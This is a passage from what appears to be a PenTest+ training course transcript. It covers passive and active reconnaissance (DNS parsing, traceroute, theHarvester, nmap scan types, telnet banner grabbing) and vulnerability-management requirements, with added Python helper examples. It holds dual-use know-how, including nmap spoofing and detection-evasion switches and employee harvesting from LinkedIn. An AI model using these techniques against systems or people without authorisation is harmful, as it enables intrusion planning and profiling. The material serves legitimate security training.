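    _txid, _flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    for _ in range(qd):  # skip the echoed question(s): name + type + class
        _, offset = decode_name(data, offset)
        offset += 4
    records = []
    for _ in range(an):
        owner, offset = decode_name(data, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        if rtype == 1:
            value = socket.inet_ntop(socket.AF_INET, rdata)
        elif rtype == 28:
            value = socket.inet_ntop(socket.AF_INET6, rdata)
        elif rtype in (2, 5):  # NS / CNAME carry a name that may itself be compressed
            value = decode_name(data, offset)[0]
        elif rtype == 15:  # MX: 16-bit preference followed by the exchange name
            value = "%d %s" % (struct.unpack("!H", rdata[:2])[0], decode_name(data, offset + 2)[0])
        else:
            value = rdata.hex()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), ttl, value))
        offset += rdlen
    return records


def follow_chain(records, name):
    """Walk CNAME aliases from `name` like `host` does; returns (chain, addresses)."""
    chain, addresses, seen, current = [name], [], set(), name
    while current not in seen:
        seen.add(current)  # a CNAME loop would otherwise spin forever
        nxt = None
        for owner, rtype, _ttl, value in records:
            if owner == current and rtype == "CNAME":
                nxt = value
            elif owner == current and rtype in ("A", "AAAA"):
                addresses.append(value)
        if nxt is None:
            break
        chain.append(nxt)
        current = nxt
    return chain, addresses


def _rr(owner, rtype, ttl, rdata):
    """Build one class-IN resource record from an already-encoded owner name."""
    return owner + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


# Constructed answer to "www.example.test A": two CNAME hops into a made-up CDN
# domain, then A and AAAA records. b"\xc0\x0c" is a compression pointer to
# offset 12, the question name, exactly as real resolvers emit it.
SAMPLE_RESPONSE = (
    struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 4, 0, 0)
    + encode_name("www.example.test") + struct.pack("!HH", 1, 1)
    + _rr(b"\xc0\x0c", 5, 300, encode_name("www.example.test-c-3.cdn-edge.test"))
    + _rr(encode_name("www.example.test-c-3.cdn-edge.test"), 5, 60, encode_name("e1234.cdn-edge.test"))
    + _rr(encode_name("e1234.cdn-edge.test"), 1, 20, socket.inet_pton(socket.AF_INET, "203.0.113.10"))
    + _rr(encode_name("e1234.cdn-edge.test"), 28, 20, socket.inet_pton(socket.AF_INET6, "2001:db8::10"))
)


def live_lookup(name, qtype="A", resolver="8.8.8.8"):
    """Send build_query() over UDP to a public resolver (needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(3)
        sock.sendto(build_query(name, qtype), (resolver, 53))
        data, _ = sock.recvfrom(4096)
    return parse_response(data)
```

`follow_chain(parse_response(SAMPLE_RESPONSE), "www.example.test")` returns the alias chain and the terminal addresses; with network access, `follow_chain(live_lookup("www.microsoft.com"), "www.microsoft.com")` reproduces what the host command printed in the video. The point to notice is the destination of the packet: it goes to the resolver you name, never to the target's own servers, which is what keeps this step passive.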
Especially because when we used EDGAR, or even WHOIS, I was told that this company is in Redmond. So I don't want to know the geographical location; I want to know the digital path to where this website resides, and for that I have the traceroute command. Here I can see, from my machine to the location of that destination, the path I'm going through. In many situations you may see some asterisks, as you can see here; that means a probe is taking too long and could time out. That was not the case here, but when it works you're going to see step by step, from your machine to that destination, the routers that are being used to establish that path. The most important thing here is not actually the initial hops leaving my machine but the last hops: based on the last hops I will be able to gather more information about their infrastructure, such as which ISP they're using, and once the path enters their domain, their infrastructure, how many hops I have to go through until I reach that server. What is important here is msn.net: starting from here I can see that I enter the Microsoft network, which is a very, very complex infrastructure. So if this were my target, from here I would know I'm going to have a lot of work to do, but I also have many resources, because I have many devices; a complex infrastructure gives you more options. Let me hit Ctrl-C here. One caveat: unlike host and dig, traceroute is not passive. Its probe packets travel all the way to the target's network and arrive at the target's routers and the server itself, so they can be logged and attributed to your source address; treat it as the first step of active reconnaissance. Now we've seen
some tools that are very useful when performing passive information gathering, and another very helpful tool we have available is theHarvester. You can see here that I have my Kali Linux instance running. It's very important that you have a Linux operating system running while doing this course and while training for the CompTIA PenTest+ exam, and I would advise you to use Kali Linux. If you want to use, let's say, Slackware, Debian or CentOS, that's perfectly fine; the problem is that you're going to have some additional steps installing those tools. Kali Linux is a Linux distribution that already comes with many pen testing tools. Regarding theHarvester: theHarvester is a tool that will help you search for information across different types of sources. For example, if I want to search for information about people who work at, or did some course through, or have any type of association with LinkedIn, say people who work at Netflix, well, people who work at Netflix should, professionally speaking, have a profile on LinkedIn, so I could perform that type of search. But first let's take a look at theHarvester's help. Observe that you have a bunch of information here: this is how the syntax goes. We first have an introduction, then a message that the results table already exists, because I already performed a search, then some information about theHarvester, and then a bunch of options. What we want to look at is right here: I use -d to specify the domain name that I want to search for, and it doesn't have to be a domain name, it can just be a string, let's say Netflix without the .com, and -b to specify the data source I want to search in, in this case LinkedIn. These are the sources where I can perform that search; you even have "all", which runs the search in all of these sources, which obviously takes a very long time. So if I perform this type of search, what is it going to do? It will search for people on LinkedIn who are at some point associated with Netflix, who mention Netflix in their profile. That's how you use theHarvester, also a very useful tool, and also a tool that you should use to perform passive reconnaissance. I hope you enjoyed this video; please go back and take a look at those websites, the resources we have available in order to perform passive information gathering. See you in our next video. Thank you.

Welcome to our third video of module 3, where we're studying passive
and active information gathering now the focus of this video is going to see some additional tools that we can use in order to perform active information gathering or reconnaissance now keep in mind that these tools they're supposed to directly contact the um the the infrastructure used by that specific Target this means that there are some steps here that can be detected although there are some techniques and we're going to discuss that throughout the course there are some techniques where you can that you can use in order to avoid that detection but keep in mind that
there is a possibility that you get detected during this phase so you have to try to avoid that you don't want to be detected okay now what is the first tool that we have to take a look at and this is a very famous tool if you've ever watched any film any movie that um has at some point is involved with I.T specifically cyber security there is a very high probability that you saw this tool in that movie if you saw a hacker in a movie there's a very high probability that the tool that was
being displayed was this one, Network Mapper, or nmap. What does this tool do? Let's look at the most important options. This is the nmap version I am using here. By the way, once again you need a Linux instance running; I advise Kali Linux, and nmap comes natively in any Kali Linux installation. The usage line, "nmap [Scan Type(s)] [Options] {target specification}", already tells you a lot about what this tool does, or at least what it was designed for: network mapping, specifically host discovery, port scanning and network scanning. That means it was designed to tell you whether a host is alive and, if it is, which ports are listening, and you can run the same analysis against entire networks, even several different networks; it does not have to be one host, one IP address. As you can see, you can pass host names, IP addresses, networks and so on: a domain name, a network in CIDR notation, one specific IP address or a range of IP addresses, to name a few examples.

I mentioned that nmap was initially designed with that goal, but it evolved a lot over the years. For example, you can run a traceroute with nmap to map the path between you, the source, and the destination, and you can keep enhancing the reconnaissance to the point where you run scripts. nmap lets you invoke a script, and that script can do all sorts of things; it is up to you, since you can develop the script yourself. Many scripts ship with nmap, written in Lua, so you can tell nmap "use this script". This is a very powerful but at the same time very dangerous resource, because you can use nmap not only to run port scans but also to check for vulnerabilities, and the problem with checking for vulnerabilities is that some of those checks actually execute an attack: if the target is susceptible, the attack works, and you may even crash the target. You have to be very, very careful in that sense; nmap groups such scripts under categories like intrusive, exploit and dos precisely so that you can leave them out.

One very important piece of information: the CompTIA PenTest+ exam requires you to know a number of the options available in nmap. Obviously not all of them, but at least the most important ones, and those are the ones we are going to talk about here.

Now, before we actually start, let's look at the very simplest usage of nmap: nmap followed by a target, here my router's IP address. Let me run that. I can see that the host is up, and it has these ports listed as either open or filtered, so port 22, that is SSH, and so on. There is one limitation when we run this type of scan (actually there are several, but let's look at just one): the association between the port number and a service name. nmap takes that name from its own lookup table, the nmap-services file that ships with it; it works much like the /etc/services text file on a Linux system, a database that maps port numbers to service names. But you may very well have port 22 running HTTP: that is not standard, but nothing prevents it, and there are nmap options that identify the real service. So do not rely on the service column of a plain scan; it is derived from the port number alone and could be wrong.

Port 22 also shows as "filtered". That does not mean "open but restricted": it means nmap could not determine whether the port is open, because its probes got no usable answer, typically because a firewall, here my gateway, drops packets to that port or rejects them with an ICMP error. Port 80, on the other hand, is fully open. Obviously, if the web server behind it demands authentication that is a separate restriction at the application layer; here we are only analysing layer 3, the network or internet layer, and layer 4, transport. I also have port 139 filtered, this port open and this other port filtered. So this is a
very simple scan you can run with nmap. Now, obviously we want to enhance that, and that is why we are going to look at some of the important options, or switches, that nmap offers.

-iL followed by a file name (lowercase i, uppercase L): input from a list. If you have so many hosts or networks to scan that you do not want to list them on the command line, you put those addresses, names and network addresses in a file. If you want to run the scan again, or add more targets, you just edit the file rather than retyping everything in the console.

-iR followed by a number of hosts (lowercase i, uppercase R): nmap randomly picks that many IP addresses as targets.

Then host discovery, with several switches. For example, if you just want to know whether hosts are up, you can disable the port scan and run only a ping scan with -sn. I will skip ahead to the most important sections; by the way, you can see that the nmap help page is divided into sections: options to specify targets, host discovery, and now scan techniques, which is one of the most important.

Scan techniques: -sS, -sT, -sA, -sW, -sM and so on, each explained on the help page. Whenever you use a lowercase s you are defining a scan technique, and the specific technique comes as a capital letter right after it. -sS is the TCP SYN scan, also called the half-open or "stealth" scan; T stands for connect (-sT, a full TCP handshake), A for ACK (-sA), and so on. Among these, the important one, and the default when you run nmap as root, is -sS (as an unprivileged user nmap falls back to -sT, because sending bare SYNs needs raw sockets): a port scan that never completes the handshake, so the target is less likely to log a full connection, which is what "stealth" refers to here. Another very important switch is -sU, the UDP scan, because by default nmap scans only TCP ports, not UDP; adding -sU scans UDP ports as well. Then there are the scans that play with the TCP flags: the Xmas scan (-sX), the FIN scan (-sF) and the NULL scan (-sN).

To give you an idea, in case you do not remember the TCP flags: if we run -sF we send TCP segments with only the FIN flag set, with no connection ever established. What happens is laid out in the TCP specification (RFC 793): a closed port answers a stray FIN with a RST, while an open port simply ignores it. So the RST tells you the port is closed, and silence suggests it is open; but a firewall dropping the probe also produces silence, which is why nmap reports the silent case as "open|filtered" rather than plainly "open". It is just another way of finding out whether a port is open, one that avoids the SYN that simple port-scan detectors look for, making it harder for the target to notice. One caveat: Windows and many appliances answer RST to every FIN probe regardless of port state, so against those targets a FIN scan shows every port as closed. Let's continue with some other options.
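The rules above are easy to get backwards, so here is an added example, not code from the course or from nmap, that encodes nmap's documented decision table for one probe and its reply across the SYN, connect, FIN/NULL/Xmas, ACK and UDP scan types, and applies it to a constructed set of replies from an imaginary host. The reply labels and the sample reply tables are my own; they stand in for what nmap observes on the wire.

```python
"""How nmap turns one probe's reply into a port state.

Added example, not from the course or the nmap project. The rules below
are the ones nmap documents for its TCP and UDP scan types; the reply
labels and the sample scan tables are constructed for illustration.
"""
from collections import defaultdict
from typing import Dict, List, Optional

# What nmap might see come back for a single probe.
SYN_ACK = "syn-ack"                        # TCP SYN+ACK
RST = "rst"                                # TCP RST
UDP_REPLY = "udp"                          # any UDP datagram from the port
ICMP_PORT_UNREACH = "icmp-port-unreach"    # ICMP type 3, code 3
ICMP_OTHER_UNREACH = "icmp-other-unreach"  # ICMP type 3, codes 0,1,2,9,10,13
# No reply at all (after nmap's retransmissions) is represented by None.


def classify(scan: str, reply: Optional[str]) -> str:
    """Return the port state nmap reports for scan type `scan` (sS, sT,
    sF, sN, sX, sA or sU, without the leading dash) given `reply`."""
    if scan in ("sS", "sT"):
        # SYN and connect scans: the handshake answer is unambiguous.
        if reply == SYN_ACK:
            return "open"
        if reply == RST:
            return "closed"
        return "filtered"           # dropped, or rejected with an ICMP error

    if scan in ("sF", "sN", "sX"):
        # FIN, NULL and Xmas probes (RFC 793 rules): a CLOSED port answers
        # with RST, an OPEN port stays silent. Silence is therefore
        # ambiguous with a firewall drop, hence "open|filtered".
        if reply == RST:
            return "closed"
        if reply in (ICMP_PORT_UNREACH, ICMP_OTHER_UNREACH):
            return "filtered"
        return "open|filtered"

    if scan == "sA":
        # ACK scan maps firewall rules, not port state: any reachable port,
        # open or closed, answers an unsolicited ACK with RST.
        return "unfiltered" if reply == RST else "filtered"

    if scan == "sU":
        if reply == UDP_REPLY:
            return "open"
        if reply == ICMP_PORT_UNREACH:
            return "closed"
        if reply == ICMP_OTHER_UNREACH:
            return "filtered"
        return "open|filtered"      # silence again: this is why -sU is slow

    raise ValueError(f"unknown scan type {scan!r}")


def summarize(scan: str, replies: Dict[int, Optional[str]]) -> Dict[str, List[int]]:
    """Group ports by state for one scan type, like the table nmap prints."""
    by_state: Dict[str, List[int]] = defaultdict(list)
    for port in sorted(replies):
        by_state[classify(scan, replies[port])].append(port)
    return dict(by_state)


# Constructed replies from an imaginary host: 22 silently dropped by a
# firewall, 80 genuinely open, 139 closed, 8080 rejected with ICMP.
SAMPLE_REPLIES_SYN = {22: None, 80: SYN_ACK, 139: RST, 8080: ICMP_OTHER_UNREACH}
# The same host probed with FIN segments: the open port and the dropped
# port look identical (silence), which is the FIN scan's blind spot.
SAMPLE_REPLIES_FIN = {22: None, 80: None, 139: RST, 8080: ICMP_OTHER_UNREACH}

if __name__ == "__main__":
    print("SYN:", summarize("sS", SAMPLE_REPLIES_SYN))
    print("FIN:", summarize("sF", SAMPLE_REPLIES_FIN))
```

Running it shows the FIN scan's blind spot directly: the port the firewall drops (22) and the genuinely open port (80) both come back as open|filtered, while the SYN scan separates them. Against a Windows target every port would show as closed under -sF, because Windows answers RST regardless of state, so a SYN scan is the right follow-up there.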
available now we're going to move on to part specification and scan order now in case you don't want to um is can the default ports that that will range from one to approximately approximately 55 000 ports you can specify specify hey this is the part that I want to scan or these are the ports that I want to scan for example I can run Dash P22 okay I only want to scan Port 22 or you can specify a range hey I want to scan Port from Port 1 to 65535 and you can actually specify according
to the transport protocol so let's remember if we don't specify uh if we don't use the dash s U capital u option it will not scan for UDP ports but let's say that you want to specify a range of boards but there is different different Port types for example ports 53 111 137 are UDP ports now 21 through 2580 139 8080 are TCP Port so you can do that kind of combination you can also specify the dash capital F auction which runs the scan in a fast mode so it scan fewer ports than the default
is scanned so it will only scan from 1 to 1024. foreign option here now we go to service or versioning detection s lowercase S capital V problem open ports to determine service version info so this is the option that you can use in order to avoid this problem right here so remember when we talked about hey there is a chance that for example Port 22 is open but it's not running as the SSH service it's running any other service okay if you want to actually ask nmap to try to identify hey and map if you
see Port open please try to actually identify the actual service so that's this option right here not only the service but of also the software version so let's say that there is a port 80 is open okay that probably that means that's it's a web server but is it really if it is it's gonna tell you hey this is a web server and also as far as I can detect the web server that is running here is let's say Apache whatever version that is now moving forward script scan and this is where I mentioned that
you can actually ask nmap to run scripts with the dash dash script option and you can then identify the script that you wanted to use in order to perform that scan so it's not only going to run a part scan but it's also going to execute that script now what does that script does well it depends there are different scripts that you have available and you can create your own just remember that you have to create those scripts in the Lua language and does that script require arguments if it does then you can use Dash
that script Dash args and then the arguments here separated by comma another very important option that you have to know is the dash capital O enable OS detection there are some situations that you're not actually very concerned about the parts that are open you just want to perform a fingerprint so you can use the dash Capital option it's going to tell you hey this device is up and the operating system that is running here is a Windows 10 for example now it doesn't mean that it's going to be precise it's going to be accurate but
it will try to do such timing and performance one other important option that you have is the dash T option with a number that ranges from 0 to 5 set timing template higher is faster so this is how fast this scan is gonna run okay and you have some other options here that you should look at those but Dash T4 for example is one option that you should know when you take the CompTIA pen Test Plus exam now also very important options here and let me go back here firewall IDs evasion and we're going to
discuss that evasion and spoofing we're going to discuss that in other modules that are to come but these are all so that means that we're going to use nmap in the future again actually you're going to use and map several different times but these are options that will help you perform Parts scan or even running scripts at the same time evading detection and Performing spoofing okay so for example if you want to spoof The Source address you can use the dash Capital as option with that IP address if you want to spoof your Mac address
then you can use dash dash spoof Dash Mac and then the MAC address now regarding the output there are different ways of displaying the results so for example this is the default right here but you have different ways of displaying that for example if you want you can display in XML and even HTML several different formats now other another very important option is Dash lowercase V it will increase the verbosity the information the debugging that you will see so as you can see you just increase the number of V's to get more information similarly to
Dash D increase the number of these and continuing okay now some miscellaneous options here very important options if you have if you want to scan a IPv6 IP you have to use the dash six option now another very resourceful option is the dash capital A it does a bunch of stuff at the same time so it enables OS detection which is the dash Capital all option version detection which is the dash lowercase S capital V it runs script scanning and it runs trace route all at the same time and here you have some examples so
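Since both the exam and real engagements expect you to process nmap output rather than read it by eye, here is an added example (not code from the course or from nmap) that parses the -oX XML format with Python's standard library. SAMPLE_XML is a constructed document shaped like real nmap output, trimmed to the attributes the parser reads; the addresses, ports and product string in it are made up.

```python
"""Parse nmap's XML output (-oX) into per-host port records.

Added example, not code from the course or from nmap. SAMPLE_XML is a
constructed document in the shape nmap writes (nmaprun/host/ports/port),
reduced to the attributes this parser reads; point parse_nmap_xml() at
the contents of a real -oX file to use it for real.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -sU -sV -O -oX scan.xml 10.0.2.2">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.2.2" addrtype="ipv4"/>
    <address addr="AA:BB:CC:DD:EE:FF" addrtype="mac"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="filtered" reason="no-response"/>
        <service name="ssh" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="micro_httpd" method="probed" conf="10"/>
      </port>
      <port protocol="udp" portid="53">
        <state state="open" reason="udp-response"/>
        <service name="domain" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="filtered" reason="no-response"/>
        <service name="netbios-ssn" method="table" conf="3"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.2.3" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

PortRecord = Dict[str, object]


def parse_nmap_xml(xml_text: str) -> Dict[str, List[PortRecord]]:
    """Map each host that is up (keyed by IPv4 address) to its port records."""
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an nmap XML document")
    hosts: Dict[str, List[PortRecord]] = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue                      # skip hosts nmap never reached
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        records: List[PortRecord] = []
        for port in host.iter("port"):
            state = port.find("state")
            svc = port.find("service")
            records.append({
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else "unknown",
                "reason": state.get("reason", "") if state is not None else "",
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                # "table": name guessed from the port number via nmap-services;
                # "probed": confirmed by a -sV version probe.
                "method": svc.get("method", "") if svc is not None else "",
            })
        hosts[addr_el.get("addr")] = records
    return hosts


def open_ports(hosts: Dict[str, List[PortRecord]], addr: str) -> List[Tuple[str, int]]:
    """(protocol, port) pairs nmap reported as open for one host."""
    return [(r["proto"], r["port"]) for r in hosts.get(addr, []) if r["state"] == "open"]


def unverified_services(hosts: Dict[str, List[PortRecord]], addr: str) -> List[Tuple[int, str]]:
    """Ports whose service name is only a table lookup: the name came from
    the port number, not from a banner, so it still needs confirming."""
    return [(r["port"], r["service"]) for r in hosts.get(addr, []) if r["method"] == "table"]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_XML)
    for ip in parsed:
        print(ip, "open:", open_ports(parsed, ip), "unverified:", unverified_services(parsed, ip))
```

The method attribute on the service element is the detail worth noticing: "table" means the service name was looked up from the port number in nmap-services, exactly the unverified guess warned about earlier, whereas "probed" means -sV actually matched a banner. unverified_services() pulls those out so you know which names still need confirming.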
Let's run two or three more examples. Let me clear the screen and run it. Obviously it may take a while, because it depends on the number of ports, and especially when you add options that gather more detail, such as -O to fingerprint and -sV to get versions, there is much more probing to be done. Port 22: nmap could not identify the version, but it did identify the service, and it is SSH indeed. Port 80 is running a micro_httpd web server, which I had never heard of, but that is what is there. Port 45431, TCP, is open, the service is UPnP, and that is the version of the software running. Since I am fingerprinting, I get not only the operating system, as you can see, but also additional information such as the MAC address, that it is running Linux with a kernel 3 or 4, and an "OS CPE" line. One correction on that line: CPE here stands for Common Platform Enumeration, the NIST naming scheme nmap uses to identify a platform (cpe:/o:linux:linux_kernel:3, for example), not customer-premises equipment, so by itself it does not tell me the device is a modem. The last line tells me how far away it is: just one hop.

Now, what if I run -A but also add -sU? Let's look at the result. Once again there is a lot of information to gather, many details, so it may take a while; we could simply limit it to a few ports, and we will do that next. In the meantime let me open another terminal and look at another option. Here I am using -p 53, because I only want to scan port 53, and -sU, because it is a UDP port, against one of Google's public DNS servers. The host is up and the port is open, and you can see how fast that was. What if I run the same scan without -sU? Two different results: before I saw 53/udp open, now I see 53/tcp open. So if I do not specify -sU I still get a port scan, but it only looks at the TCP port, not UDP. In this case the same port number, 53, is open over both TCP and UDP, which is not uncommon for DNS, the Domain Name System: it normally uses UDP for ordinary name resolution and TCP for zone transfers (and for any response too large for a single UDP datagram).

So those are some of the options, while that earlier scan is still running; it takes a very long time, especially because of -sU. While it runs, let's move on and look at another very important tool, one that can be very resourceful: telnet. You can use ncat as well; netcat, the nc command, gives you more power, but we will use netcat in another situation. Right now let's just take
a look at the telnet command. Telnet was originally used simply to make a remote connection, many years ago, with no encryption. Nowadays you do not use telnet for remote access anymore; you use SSH, because it gives you remote access over an encrypted channel. So why do we still need to understand telnet and know how to use it? Because it ended up becoming a debugging tool. Debugging how? Say I want to see whether a port is open. You could use nmap for that, true, but what if I want not only to see that the port is open but also whether I can establish a connection, and beyond that, whether I can speak the protocol on that port? Each protocol has its own language, and if you can speak it you can hold an entire conversation with the service using telnet.

Let's look at an example: I telnet to my modem on port 80. By default telnet uses port 23, which obviously is not enabled anymore, it being a dangerous protocol, but I am connecting to port 80, where we saw HTTP earlier. "Escape character is..." and "Connected": I can see that I connected not only to that server but to that server's port 80. Now that I am connected to port 80, whatever I type here has to be HTTP. HTTP works with what it calls methods, or operations; let's use the GET method. I got a response: 400 Bad Request. Note that this is not an authentication failure: a 400 means the server could not parse what I typed, and an HTTP/1.1 request needs at least a request line and a Host header, each ending in CRLF and followed by a blank line. Had authentication been the issue, the answer would have been 401 Unauthorized with a WWW-Authenticate header, which is where the Digest scheme, the one that exchanges hashes instead of the password itself, would show up. Even so, I received an HTTP response with headers that tell me more about this HTTP server. That is why you should know how to use telnet: you can not only check whether a port is open but also connect, establish a conversation, and gather more information.
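To show what speaking the protocol by hand actually means, here is an added example (not code from the course) in Python that does what the telnet session does, but with a well-formed request and a parser for the reply. SAMPLE_RESPONSE is a constructed 401 in the style of a router's web server; the target address 10.0.2.2 and the header values are assumptions for illustration.

```python
"""Speak HTTP by hand over a raw socket, as the course does with telnet.

Added example, not code from the course. build_request() emits a minimal
but well-formed HTTP/1.1 request (request line, Host header, CRLF line
endings and a blank line, which is what a hand-typed "GET /" usually lacks
and why it earns a 400), parse_response() splits the reply, and
grab_banner() runs the exchange against a live host. SAMPLE_RESPONSE is a
constructed reply; 10.0.2.2 is an assumed lab target, not a real one.
"""
import socket
from typing import Dict, Tuple

MAX_RESPONSE = 64 * 1024   # stop reading a chatty server at 64 KiB


def build_request(host: str, path: str = "/", method: str = "GET") -> bytes:
    """Minimal HTTP/1.1 request. Lines end in CRLF; an empty line ends the headers."""
    lines = [
        f"{method} {path} HTTP/1.1",
        f"Host: {host}",
        "User-Agent: banner-grab/0.1",
        "Connection: close",        # ask the server to hang up after one response
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_response(raw: bytes) -> Tuple[int, str, Dict[str, str]]:
    """Return (status code, reason phrase, lower-cased header dict)."""
    head, _sep, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    parts = lines[0].split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("HTTP/"):
        raise ValueError(f"not an HTTP status line: {lines[0]!r}")
    status = int(parts[1])
    reason = parts[2] if len(parts) == 3 else ""
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return status, reason, headers


def interesting_headers(headers: Dict[str, str]) -> Dict[str, str]:
    """The headers a recon pass cares about: software identity and auth scheme."""
    keys = ("server", "x-powered-by", "www-authenticate")
    return {k: headers[k] for k in keys if k in headers}


def grab_banner(host: str, port: int = 80, timeout: float = 5.0):
    """Connect, send the request, read until the server closes (or MAX_RESPONSE)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host))
        buf = b""
        while len(buf) < MAX_RESPONSE:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    return parse_response(buf)


# Constructed reply: what an authenticating router might send back. A 401
# with WWW-Authenticate is the authentication case; the Digest scheme is
# the one that exchanges hashes rather than the password itself.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 401 Unauthorized\r\n"
    b"Server: micro_httpd\r\n"
    b'WWW-Authenticate: Digest realm="router", nonce="abc123", qop="auth"\r\n'
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"<html><body>Authorization required</body></html>"
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # e.g. python3 banner.py 10.0.2.2
        status, reason, hdrs = grab_banner(sys.argv[1])
    else:
        status, reason, hdrs = parse_response(SAMPLE_RESPONSE)
    print(status, reason, interesting_headers(hdrs))
```

The Server and WWW-Authenticate headers are the recon payoff: they name the software and the authentication scheme before you ever send credentials, which is precisely the information the hand-typed telnet session was after.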
Now you can see that our nmap scan is still running, so I am going to fast forward. Finally, after a very long time, the scan is done. The reason it took so long is that UDP scanning is hard: UDP is not connection-oriented, so a silent port has to be retried before nmap can decide anything, and identifying the service and version on top of that makes it slower still. So here is the result: I have port 53/udp open, 49181/udp listed but shown as closed, so no service could be identified there (again, not connection-oriented), and there is the service it was able to identify on port 5353. So we saw many different options available in nmap, a lot of things we can combine, and we also have to know how to use telnet.

Two more tools that we will look at in a following module, but that you should know exist, are Wireshark and tcpdump. Loosely speaking, Wireshark is the graphical counterpart of tcpdump; both are packet sniffers built on the same capture library, libpcap, and both can be used for information gathering, reconnaissance, even enumeration. What they do is capture the packets flowing through your network interface, which is always receiving packets, decode them, and show you their contents, so there is additional information you can gather with them. In this video we saw some tools available for active information gathering. I hope you enjoyed this video, thank you very much.

Hello, welcome to our fourth module, where we focus on vulnerability scans. This module is divided into two different phases. The first, mostly theoretical, phase focuses on vulnerability management. So in
vulnerability management we have to understand the steps required to identify vulnerabilities and how to manage them once they are found. Before any vulnerability scan is actually performed, we first have to identify whether the client, or your own company, operates in a regulated environment, meaning: is it a company that deals with a type of data that has to be compliant with some regulatory body? For example, we previously mentioned a few regulations and regulatory institutions, and one that is very well known is HIPAA. Just to remember, HIPAA stands for the Health Insurance Portability and Accountability Act, and we also have another one called the Gramm-Leach-Bliley Act. HIPAA is an act that defines many regulations regarding health insurers and health information, whereas the Gramm-Leach-Bliley Act regulates how financial institutions handle customer financial data.

Why is it important to identify whether a client's environment is a regulated one? Because those regulations may require pen tests or scans to be performed. In some cases, such as HIPAA and GLBA, they do not specifically say that pen tests must be executed; they regulate how data must be handled, and if they regulate how data must be handled there is a pressing need for pen tests to be executed, but keep in mind that they do not explicitly require pen tests, nor do they explicitly require vulnerability scans. On the other hand, there are frameworks such as PCI DSS, the Payment Card Industry Data Security Standard, and FISMA, the Federal Information Security Management Act, that do specifically require vulnerability scans. They may define the frequency at which these scans are to be executed, or they may only give broader guidance, so let's look at both.

First of all, both PCI DSS and FISMA regulate how data must be handled, and both regulate the periodicity of vulnerability scans, which is to be included in the vulnerability management program. That is another term you are going to see on the CompTIA PenTest+ exam: the vulnerability management program, which the company must have (the pen tester executes parts of it, but the program belongs to the company). It is documentation dictating how vulnerabilities are to be managed.

PCI DSS states that the vulnerability management program must include internal and external vulnerability scans, at least quarterly and after any significant change, executed by qualified personnel. What does that mean? It means vulnerability scans are to be performed at least every three months. (One distinction worth keeping straight for the exam: PCI DSS requires quarterly vulnerability scans, but penetration tests only annually and after significant changes; the two are separate requirements.) If a significant vulnerability is found by a scan, another scan is to be performed right after those significant vulnerabilities are addressed. Say the first scan runs in January and nothing significant is found; the second is due in April. If something significant is found in April, it must be addressed as soon as possible, and once it is fixed another scan must be executed; the company is not supposed to wait until July to scan again. Scans must also be executed by qualified personnel, high-risk vulnerabilities must be addressed, and rescans must follow remediation, as mentioned. External scans must be executed by an Approved Scanning Vendor, or ASV. ASVs are approved and listed by the PCI Security Standards Council (not by NIST), so on the PCI SSC website there is a list of approved scanning vendors. A company that handles credit card transactions must be PCI DSS compliant, which means it must run vulnerability scans with the periodicity shown here, and the external scans must be executed by an approved scanning vendor.

Regarding FISMA, the requirements come from the NIST SP 800-53 control catalog that FISMA obliges US federal agencies to follow; what you see on the screen is the RA-5 control, Vulnerability Scanning. It requires scans for vulnerabilities in the information system and hosted applications at an organization-defined frequency and/or randomly in accordance with an organization-defined process, and when new vulnerabilities potentially affecting the system or applications are identified and reported. So you can see that the frequency is not fixed; it is defined by the organization. However, it specifically says that when new vulnerabilities are reported, the system must be scanned for them and the findings remediated. By the way, FISMA applies to the US federal government and its agencies. The control continues: employ vulnerability scanning tools and techniques that facilitate interoperability among tools and automate parts of the vulnerability management process by using standards for enumerating platforms, software flaws and improper configurations. So FISMA is a bit different because it also constrains the tooling: the tools must enumerate platforms, identify software flaws and identify improper configurations using standards (in practice the SCAP family: CPE for platforms, CVE for software flaws, CCE for configurations). Next, standards for formatting checklists and test procedures (XCCDF and OVAL): so not only execute, but follow a checklist of test procedures. Then measuring vulnerability impact: the impact of each vulnerability must be measured, which we will actually cover in a following module, module 5, where we learn to measure the impact of a vulnerability with a score (CVSS). Then: analyze vulnerability scan reports and results from security control assessments, so not only execute but also analyze the reports. Remediate legitimate vulnerabilities within organization-defined response times in accordance with an organizational assessment of risk. And share information obtained from the vulnerability scanning process and security control assessments with organization-defined personnel or roles to help eliminate similar 